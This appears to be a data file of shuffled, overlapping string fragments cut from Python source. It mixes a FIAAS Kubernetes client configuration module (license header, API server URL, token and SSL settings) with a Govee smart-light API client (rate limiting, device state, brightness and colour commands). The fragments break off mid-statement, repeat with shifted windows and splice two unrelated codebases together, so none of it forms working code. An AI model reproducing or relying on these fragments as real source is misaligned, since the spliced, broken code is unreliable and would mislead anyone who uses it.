# See the License for the specific language governing permissions and #", "#: Default timeout for streaming operations stream_timeout = 3600 #: Default size of", "\"License\"); # you may not use this file except in compliance with the", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "required by applicable law or agreed to in writing, software # distributed under", "for most operations timeout = 20 #: Default timeout for streaming operations stream_timeout", "timeout for streaming operations stream_timeout = 3600 #: Default size of Watcher cache", "= \"\" #: API certificate cert = None #: Should the client verify", "under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API server URL api_server", "applicable law or agreed to in writing, software # distributed under the License", "and # limitations under the License. \"\"\"Singleton configuration for k8s client\"\"\" #: API", "python # -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # #", "SSL certificates? verify_ssl = True #: Enable debugging debug = False #: Default", "for streaming operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size", "or agreed to in writing, software # distributed under the License is distributed", "operations timeout = 20 #: Default timeout for streaming operations stream_timeout = 3600", "or implied. # See the License for the specific language governing permissions and", "certificates? verify_ssl = True #: Enable debugging debug = False #: Default timeout", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. 
# See the License for", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token api_token = \"\" #: API certificate cert", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "streaming operations stream_timeout = 3600 #: Default size of Watcher cache watcher_cache_size =", "with the License. # You may obtain a copy of the License at", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "for k8s client\"\"\" #: API server URL api_server = \"https://kubernetes.default.svc.cluster.local\" #: API token", "#: API certificate cert = None #: Should the client verify the servers", "API certificate cert = None #: Should the client verify the servers SSL", "in writing, software # distributed under the License is distributed on an \"AS", "20 #: Default timeout for streaming operations stream_timeout = 3600 #: Default size", "timeout = 20 #: Default timeout for streaming operations stream_timeout = 3600 #:", "# -*- coding: utf-8 # Copyright 2017-2019 The FIAAS Authors # # Licensed", "under the Apache License, Version 2.0 (the \"License\"); # you may not use" ]
[ "remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is", "and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL])", "None device_str, device = self._get_device(device) if not device: err = f\"Invalid device {device_str},", "_RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining", "await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object):", "device from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last", "= devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]:", "prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if", "result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for", "to API.\"\"\" try: # this will set self.online await self.ping() except: pass return", "self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state = False elif", "def close(self): \"\"\"Use close when your are finished with the Client without using", "] = await self._learning_storage._read_cached() changed = False # init Dict and entry for", "limiting. 
Defaults to 5, which means there is some room for other clients.", "else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err", "0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 *", "f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec)", "self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY", "close(self): \"\"\"Use close when your are finished with the Client without using an", "except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api", "request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting -", "{text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async", "one specific device.\"\"\" device_str, device = self._get_device(device) result = None err = None", "we just changed something, return state from history self._devices[device_str].source = \"history\" result =", "with (r, g, b) values\" else: red = color[0] green = color[1] blue", "device_str, device = self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until)", "self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: #", "item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None", "message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff:", "# do not send another control within n seconds after controlling the device", "from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self): \"\"\"Last request", "red = color[0] green = 
color[1] blue = color[2] if red < 0", "254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else:", "brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success =", "params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params", "learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error", "_LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max,", "= -1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values", "< 2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed", "seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not", "if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state = False", "option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state =", "= onOff result, err = await self._control(device, command, params) success = False if", "= self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool:", "call count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset =", "not device: err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err", "limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except", 
"None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning", "def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate limit will be reset.\"\"\"", "text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper method to", "support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state", "async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will", "aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session:", "something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state", "- self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def", "_api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal(", "err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max =", "HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) )", "device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it", "as long as we run. 
# we will need to re-learn every time", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def", "timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result =", "if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong:", "item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False,", "method if you want to use this Client without an async context manager.\"\"\"", "self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str", "device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not", "result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color", "\"\"\"Delay a call when rate limiting is active.\"\"\" # do we have requests", "entry for device if learning_infos == None: learning_infos = {} if device.device not", "by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError):", "not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3:", "async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]:", "str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\":", "err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states 
for all devices from API.\"\"\"", "self._online != online: self._online = online # inform about state change self.events.online(self._online) if", "learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting", "device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text", "need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting", "= \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self, device:", ") result = await response.json() else: text = await response.text() err = f\"API-Error", "\"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val > self._limit: raise", "not None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: #", "Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and error", "[] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice:", "result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug(", "or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice):", "return \"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str,", "device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200:", "result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\"", "device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp =", "there is some room for other clients. 
\"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self,", "trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val}", "_API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL", "f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False", "The maximum number of requests you're permitted to make per minute. _RATELIMIT_REMAINING =", "cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if", "0 return success, err async def _learn(self, device): \"\"\"Persist learned information from device", "turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "= False prop_power_state = False prop_brightness = False prop_color = (0, 0, 0)", "= None device_str, device = self._get_device(device) if not device: err = f\"Invalid device", "def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device)", "and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]:", "_LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None: #", "err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async", "Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the", ") -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success =", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp", "in self._devices: device = None # disallow unknown devices elif isinstance(device, str) and", "device: err = f\"Invalid device 
{device_str}, {device}\" else: command = \"turn\" params =", "ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\")", "self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called", "_API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\"", "response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices also utilize", "async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device,", "as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result,", "learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off =", "device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if", "f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else:", "in UTC epoch seconds. # return state from hisory for n seconds after", "brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness *", "brightness < 0 or brightness > 254: err = f\"set_brightness: invalid value {brightness},", "prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off", "default, use config_offline_is_off from learning, or False by default. 
False: an offline device", "start = time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False)", "learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when your are", "self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the", "_RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate limit window", "%s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error =", "config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is offline. None: default,", "'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just", "0-254.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "an internal learning storage as long as we run. # we will need", "self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, )", "from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\":", "str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success", "not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True #", "from cache: {result}, next state for {device.device} from api allowed in {seconds_locked} seconds\"", "manager response yield response except aiohttp.ClientError as ex: # we are offline self._set_online(False)", "\"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object:", "able to connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set", "> self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" )", "bool): \"\"\"Set the 
online state and fire an event on change.\"\"\" if self._online", "= self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: command", "= await response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color", "online self._track_rate_limit(response) # return the async content manager response yield response except aiohttp.ClientError", "got something, so we are online self._track_rate_limit(response) # return the async content manager", "match the actual brightness pull the brightness up to max once.\", device.device, )", "limiting is active.\"\"\" # do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on:", "async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]:", "\"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int", "is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None async", "Cmd Value # set brightness as 0..100 as 0..254 didn't work brightness_set =", "govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__)", "learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False #", "_API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" #", "# show all devices as offline for device in self.devices: device.online = False", "learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO", "color (r, g, b) where each value may be in range 0-255 \"\"\"", "= f\"set_color: invalid value {color}, blue must be within 0 .. 
254\" else:", "to connect to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the", "left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec =", "err_msg): self._err_msg = err_msg status = -1 async def text(self): return self._err_msg yield", "bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online await self.ping()", "val @property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter", "= None # disallow unknown devices elif isinstance(device, str) and device_str in self._devices:", "lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool #", "online: self._online = online # inform about state change self.events.online(self._online) if not online:", "aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown error: %s\"", "self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\"", "GoveeDevice): device_str = device.device if not device_str in self._devices: device = None #", "> 255: err = ( f\"set_color: invalid value {color}, red must be within", "str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth),", "response.headers and _RATELIMIT_REMAINING in response.headers and _RATELIMIT_RESET in response.headers ): try: self._limit =", "= brightness_result_100 command = \"brightness\" result, err = await self._control(device, command, brightness_set) if", "f\"set_color: invalid value {color}, red must be within 0 .. 
254\" ) elif", "pull the brightness up to max once.\", device.device, ) changed = True learning_infos[", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness =", "self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device", "device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\"", "prop_brightness > 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't", "get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay", "an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True", "self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe available call", "device {device_str}, {device}\" else: if len(color) != 3: err = f\"set_color: invalid value", "= 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use", "red < 0 or red > 255: err = ( f\"set_color: invalid value", "err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" +", "except aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error from", "{device}\" else: command = \"turn\" params = onOff result, err = await self._control(device,", "self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\" ) if", "device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not", "self._online = online # inform about state change self.events.online(self._online) if not online: #", "for one specific device.\"\"\" device_str, device = self._get_device(device) result = None err 
=", "Dict and entry for device if learning_infos == None: learning_infos = {} if", "device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return", "def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds", "].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug(", "\"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API", "be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will", "command in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control", "item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp,", "200: timestamp = self._utcnow() json_obj = await response.json() prop_online = False prop_power_state =", "= f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else: if brightness", "led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\":", "strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params}", "is assumed. 
If the brightness slider doesn't match the actual brightness pull the", "online(self): \"\"\"Last request was able to connect to the API.\"\"\" return self._online def", "@classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ):", "available call count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset", "prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"]", "def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address", "lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is", "set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]:", "if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not", "resets in UTC epoch seconds. # return state from hisory for n seconds", "{cmd}\") result = None err = None if not device: err = f\"Invalid", "prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0 for prop", "= await response.json() else: text = await response.text() err = f\"API-Error {response.status} on", "= \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next", "# we are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex)", "device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max", "rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests", "safe available call count for multiple processes self._limit = 100 self._limit_remaining = 100", ".. 
254\" elif blue < 0 or blue > 255: err = f\"set_color:", "# do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0:", "= False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: #", "create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\"", "self._api_get(url=_API_PING, auth=False) as response: result = await response.text() delay = int((time.time() - start)", "False: an offline device doesn't change power state. True: an offline device is", "!= device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness", "as response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None):", "- self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to", "prop_online = False prop_power_state = False prop_brightness = False prop_color = (0, 0,", "long as we run. # we will need to re-learn every time again.", "value {color}, must be tuple with (r, g, b) values\" else: red =", "0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all", "int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds}", "= f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not", "also handles: - rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay()", "trigger rate limiting. 
Defaults to 5, which means there is some room for", "async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async", "allowed range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command,", "API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if err:", "auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put(", "device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max ==", "uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max ==", "possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\"", "dicts with one element if \"online\" in prop: prop_online = prop[\"online\"] is True", "which the current rate limit window resets in UTC epoch seconds. # return", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp", "async content manager response yield response except aiohttp.ClientError as ex: # we are", "!= 3: err = f\"set_color: invalid value {color}, must be tuple with (r,", "is active.\"\"\" # do we have requests left? if self.rate_limit_remaining <= self.rate_limit_on: #", "seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee", "rate limiting. 
Defaults to 5, which means there is some room for other", "prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None", "f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command", "-> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property", "return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices", "value may be in range 0-255 \"\"\" success = False err = None", "config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\"", "prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"],", "if you want to use this Client without an async context manager.\"\"\" self", "\"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a", "a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device", "val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for", "self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str,", ".. 
254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api", "package.\"\"\" import asyncio import logging import time import math from contextlib import asynccontextmanager", "response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check", "= math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set brightness", "async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do", "def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if val", "other devices also utilize the govee API\" ) limit_unknown = True if (", "self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json() timestamp =", "before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly overridden by", "= 254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "v%s\", VERSION) self._online = True # assume we are online self.events = Events()", "err = await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max =", "_LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown =", "from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER =", "learning, or False by default. 
False: an offline device doesn't change power state.", "and entry for device if learning_infos == None: learning_infos = {} if device.device", "device.\"\"\" device_str, device = self._get_device(device) result = None err = None seconds_locked =", "self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color", "= self._utcnow() json_obj = await response.json() prop_online = False prop_power_state = False prop_brightness", "{device.device} from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device,", "self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None", "API: {json_obj}, resulting state object: {result}\" ) else: errText = await response.text() err", "await self._control( device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await", "or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max = (", "manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if", "> 254: err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\"", "internal learning storage as long as we run. # we will need to", "offline device is shown as off. 
